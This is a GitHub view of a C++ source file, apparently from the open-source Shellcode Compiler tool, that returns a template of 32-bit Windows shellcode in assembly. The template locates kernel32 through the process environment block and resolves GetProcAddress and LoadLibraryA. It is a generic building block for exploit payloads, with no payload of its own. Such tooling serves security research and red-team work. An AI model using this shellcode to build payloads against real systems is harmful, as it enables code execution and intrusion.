FilesExpand file tree

 master

/

ASMHeader.cpp

Copy path

BlameMore file actions

BlameMore file actions

Latest commit

 

History

History

History

67 lines (59 loc) · 4.23 KB

 master

/

ASMHeader.cpp

Top

File metadata and controls

• Code
• Blame

67 lines (59 loc) · 4.23 KB

Raw

Copy raw file

Download raw file

Open symbols panel

Edit and raw actions

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

#include "ASMHeader.h"

// Function that returns the default ASM Header

string ASMHeader::GetASMHeader()

{

string sContent =

"; Shellcode generated using Shellcode Compiler \r\n"

"; https://github.com/NytroRST/ShellcodeCompiler \r\n\r\n"

"BITS 32 \r\n"

"SECTION .text \r\n"

"global main \r\n"

"main: \r\n\r\n"

"xor ecx, ecx \r\n"

"mov eax, [fs:ecx + 0x30] ; EAX = PEB \r\n"

"mov eax, [eax + 0xc] ; EAX = PEB->Ldr \r\n"

"mov esi, [eax + 0x14] ; ESI = PEB->Ldr.InMemOrder \r\n"

"lodsd ; EAX = Second module \r\n"

"xchg eax, esi ; EAX = ESI, ESI = EAX \r\n"

"lodsd ; EAX = Third(kernel32) \r\n"

"mov ebx, [eax + 0x10] ; EBX = Base address \r\n"

"mov edx, [ebx + 0x3c] ; EDX = DOS->e_lfanew \r\n"

"add edx, ebx ; EDX = PE Header \r\n"

"mov edx, [edx + 0x78] ; EDX = Offset export table \r\n"

"add edx, ebx ; EDX = Export table \r\n"

"mov esi, [edx + 0x20] ; ESI = Offset namestable \r\n"

"add esi, ebx ; ESI = Names table \r\n"

"xor ecx, ecx ; EXC = 0 \r\n\r\n"

"Get_Function: \r\n\r\n"

"inc ecx ; Increment the ordinal \r\n"

"lodsd ; Get name offset \r\n"

"add eax, ebx ; Get function name \r\n"

"cmp dword [eax], 0x50746547 ; GetP \r\n"

"jnz Get_Function \r\n"

"cmp dword [eax + 0x4], 0x41636f72 ; rocA \r\n"

"jnz Get_Function \r\n"

"cmp dword [eax + 0x8], 0x65726464 ; ddre \r\n"

"jnz Get_Function \r\n"

"mov esi, [edx + 0x24] ; ESI = Offset ordinals \r\n"

"add esi, ebx ; ESI = Ordinals table \r\n"

"mov cx, [esi + ecx * 2] ; Number of function \r\n"

"dec ecx \r\n"

"mov esi, [edx + 0x1c] ; Offset address table \r\n"

"add esi, ebx ; ESI = Address table \r\n"

"mov edx, [esi + ecx * 4] ; EDX = Pointer(offset) \r\n"

"add edx, ebx ; EDX = GetProcAddress \r\n\r\n"

"xor ecx, ecx ; ECX = 0 \r\n"

"push ebx ; Kernel32 base address \r\n"

"push edx ; GetProcAddress \r\n"

"push ecx ; 0 \r\n"

"push 0x41797261 ; aryA \r\n"

"push 0x7262694c ; Libr \r\n"

"push 0x64616f4c ; Load \r\n"

"push esp ; LoadLibrary \r\n"

"push ebx ; Kernel32 base address \r\n"

"call edx ; GetProcAddress(LL) \r\n\r\n"

"add esp, 0xc ; pop LoadLibrary \r\n"

"pop ecx ; ECX = 0 \r\n"

"push eax ; EAX = LoadLibrary \r\n\r\n";

return sContent;

}